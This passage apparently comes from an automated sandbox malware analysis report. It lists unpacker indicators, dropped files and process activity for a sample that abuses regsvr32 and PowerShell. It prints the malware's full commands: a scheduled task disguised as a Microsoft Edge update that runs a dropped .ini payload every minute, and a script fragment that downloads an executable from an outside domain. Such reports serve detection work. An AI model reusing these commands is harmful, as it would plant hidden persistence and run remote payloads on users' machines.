                        Source: Binary string: winload_prod.pdbsAlarms^ source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ntkrnlmp.pdbPX6 source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880EF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 7.2.regsvr32.exe.13129ac0.3.raw.unpack, Redist.cs.Net Code: CoreMain
                        Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 7.3.regsvr32.exe.2d84fa0.6.raw.unpack, Redist.cs.Net Code: CoreMain
                        Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 7.2.regsvr32.exe.2d84fa0.0.raw.unpack, Redist.cs.Net Code: CoreMain
                        Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 7.3.regsvr32.exe.2d84fa0.7.raw.unpack, Redist.cs.Net Code: CoreMain
                        Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 7.2.regsvr32.exe.1b880000.4.raw.unpack, Redist.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.10.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.10.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.8.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.8.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.32.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.32.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.47.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.47.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.40.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.40.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.37.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.37.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.43.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.43.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.20.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.20.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 11.3.OpenWith.exe.1bd8822aa00.24.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 11.3.OpenWith.exe.1bd8822aa00.24.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Suspicious powershell command line found
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                        Source: C:\Users\Public\ajbs50ul.batProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"Jump to behavior
                        Source: C:\Windows\System32\rekeywiz.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: .rodata
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: .xdata
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: /4
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: /19
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: /31
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: /45
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: /57
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: /70
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: /81
                        Source: utox_x86_x64.exe.1.drStatic PE information: section name: /92
                        Source: ajbs50ul.bat.1.drStatic PE information: section name: .xdata
                        Source: 4smg.ini.3.drStatic PE information: section name: .xdata
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC33D2A5 pushad ; iretd 4_2_00007FFAAC33D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC457962 push ebx; retf 4_2_00007FFAAC45796A
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F340F7 push eax; ret 7_3_02F340FB
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F362E3 push ebx; ret 7_3_02F362E6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F35ED9 push esi; ret 7_3_02F35EDD
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F34EB2 pushad ; retf 7_3_02F34EB3
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F348BE push eax; retf 7_3_02F348BF
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F31865 push cs; ret 7_3_02F318C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F35643 push eax; retf 7_3_02F35645
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F34427 pushad ; ret 7_3_02F34428
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F36C12 push edx; retf 7_3_02F36C26
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F3220B push eax; iretd 7_3_02F32224
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F359E3 push esi; retf 7_3_02F359E6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F335EC push esi; ret 7_3_02F335ED
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F317D5 push cs; ret 7_3_02F318C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_3_02F3430B push eax; retf 7_3_02F3430C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F340F7 push eax; ret 7_2_02F340FB
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F362E3 push ebx; ret 7_2_02F362E6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F35ED9 push esi; ret 7_2_02F35EDD
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F34EB2 pushad ; retf 7_2_02F34EB3
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F348BE push eax; retf 7_2_02F348BF
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F31865 push cs; ret 7_2_02F318C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F35643 push eax; retf 7_2_02F35645
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F34427 pushad ; ret 7_2_02F34428
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F36C12 push edx; retf 7_2_02F36C26
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F3220B push eax; iretd 7_2_02F32224
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F359E3 push esi; retf 7_2_02F359E6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F335EC push esi; ret 7_2_02F335ED
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F317D5 push cs; ret 7_2_02F318C4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_02F3430B push eax; retf 7_2_02F3430C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_1C0DA41B pushad ; iretd 7_2_1C0DA536
                        Source: C:\Windows\System32\rekeywiz.exeFile created: C:\Users\user\AppData\Roaming\oSyU.iniJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\utox_x86_x64.exeJump to dropped file
                        Source: C:\Users\Public\ajbs50ul.batFile created: C:\Users\user\AppData\Roaming\4smg.iniJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\ajbs50ul.batJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\ajbs50ul.batJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\ajbs50ul.batJump to dropped file
                        Source: C:\Users\Public\ajbs50ul.batFile created: C:\Users\user\AppData\Roaming\4smg.iniJump to dropped file
                        Source: C:\Windows\System32\rekeywiz.exeFile created: C:\Users\user\AppData\Roaming\oSyU.iniJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the user root directory
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\ajbs50ul.batJump to dropped file
                        Powershell creates an autostart link
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'utox_x86_x64.exe') -oulv 'htv7i9rockp24tdocs.lol/utox_x86.p24xp24';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
